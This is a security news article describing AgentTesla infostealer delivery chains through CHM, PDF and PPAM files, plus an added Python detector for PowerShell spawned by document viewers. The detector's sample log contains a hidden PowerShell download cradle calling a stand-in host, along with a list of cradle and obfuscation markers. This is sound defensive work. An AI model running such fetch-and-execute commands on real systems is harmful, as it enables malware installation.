According to findings by CRIL (Cyble Research and Intelligence Labs), the well-known infostealer AgentTesla has adopted new distribution strategies that rely on files with the CHM and PDF extensions.
The malware, which comes with several dangerous capabilities such as keylogging, access to the file system and the ability to exfiltrate data to a command-and-control server, has therefore been strengthened by its creators.
In the case of CHM files, the infection starts with a spam e-mail. The attached file acts as bait and, once opened, executes a PowerShell script without the victim's knowledge. This installs malicious code, which in turn downloads a .NET-based DLL that starts the actual infection.
The situation with PDF files is quite different.
AgentTesla, CHM and PDF files: how to avoid disasters?
Here the PDF uses two different strategies to spread the infection. In the first technique, the PDF triggers a PowerShell command that loads the AgentTesla malware more directly.
The second technique shows a kind of error message when the victim tries to open the PDF, together with a button to reload the document: this button actually downloads a PPAM file (a PowerPoint add-in). The PPAM then performs PowerShell operations that download AgentTesla.
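All three delivery chains described above end the same way: a document handler (the CHM viewer, a PDF reader, or PowerPoint loading the PPAM add-in) spawns PowerShell, which then fetches AgentTesla. That parent/child relationship is a far more stable detection point than any single file hash. The detector below is an added example, not code from CRIL or from the article; it assumes Sysmon-style process-creation events serialised as one JSON object per line (fields `Image`, `ParentImage`, `CommandLine`, `UtcTime`), and the sample log lines, process names and the `example.invalid` URL are constructed for the demonstration.

```python
"""Flag PowerShell processes spawned by document handlers, the common step in
the AgentTesla CHM / PDF / PPAM chains. Added example; the event format and
the sample lines below are constructed, not real telemetry."""
from __future__ import annotations

import json
from dataclasses import dataclass

# Parents that should not normally launch PowerShell. hh.exe is the Windows
# HTML Help viewer that opens .chm files; the PDF reader and Office image
# names are assumptions, extend them for the software actually deployed.
SUSPICIOUS_PARENTS = {
    "hh.exe": "CHM help file launched PowerShell",
    "acrord32.exe": "PDF reader launched PowerShell",
    "acrobat.exe": "PDF reader launched PowerShell",
    "powerpnt.exe": "PowerPoint (PPAM add-in host) launched PowerShell",
}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Coarse markers of a download cradle or obfuscated command line; a hit on
# any of these raises the severity (substring match, so expect some noise).
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "iwr ", "iex", "frombase64string", "-enc", "-encodedcommand")


@dataclass
class Alert:
    time: str
    parent: str
    reason: str
    severity: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyse_event(event: dict) -> Alert | None:
    """Return an Alert if a suspicious parent spawned PowerShell, else None."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    if image not in POWERSHELL_IMAGES or parent not in SUSPICIOUS_PARENTS:
        return None
    cmd = event.get("CommandLine", "")
    severity = "high" if any(m in cmd.lower() for m in CRADLE_MARKERS) else "medium"
    return Alert(event.get("UtcTime", ""), parent, SUSPICIOUS_PARENTS[parent],
                 severity, cmd)


def scan(lines) -> list[Alert]:
    """Run analyse_event over JSON-lines telemetry, skipping malformed rows."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # do not let one bad row abort the whole scan
        alert = analyse_event(event)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample: explorer opening a CHM (benign on its own), the three
# document-handler -> PowerShell chains, an admin's own PowerShell, and junk.
SAMPLE_LOG = r"""
{"UtcTime": "2023-03-01 09:12:01", "Image": "C:\\Windows\\hh.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "hh.exe C:\\Users\\u\\Downloads\\invoice.chm"}
{"UtcTime": "2023-03-01 09:12:03", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\hh.exe", "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\""}
{"UtcTime": "2023-03-01 10:40:17", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe", "CommandLine": "powershell.exe -NoProfile -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"UtcTime": "2023-03-01 11:02:55", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE", "CommandLine": "powershell.exe -File C:\\Users\\u\\AppData\\Local\\Temp\\run.ps1"}
{"UtcTime": "2023-03-01 11:30:00", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -c Get-Process"}
this line is not json
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG.splitlines()):
        print(f"[{a.severity}] {a.time} {a.reason}: {a.command_line}")
```

Against the constructed log the scan yields three alerts (CHM chain and PDF chain as high, the PPAM chain as medium because its command line carries no cradle marker) and ignores both the explorer-spawned PowerShell and the malformed row. In production the parent list should be tuned to the viewers actually installed, and the command-line markers treated as a severity hint rather than a gate, since an encoded or file-based payload can look perfectly bland.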
To prevent infection by this infostealer, the experts have offered users several useful tips.
Applying effective email-filtering solutions is essential to avoid real disasters: this way spam, scams, phishing and malicious attachments can be blocked without much effort. CHM and PPAM attachments in particular are rarely legitimate in e-mail and can usually be blocked outright at the gateway.
Avoiding clicks on links of dubious origin and downloads of files from potentially suspicious emails is another way to protect your devices. Finally, adopting an antivirus suite that is up to the task and always kept up to date can further help limit the dangers posed by these infostealers (and not only them).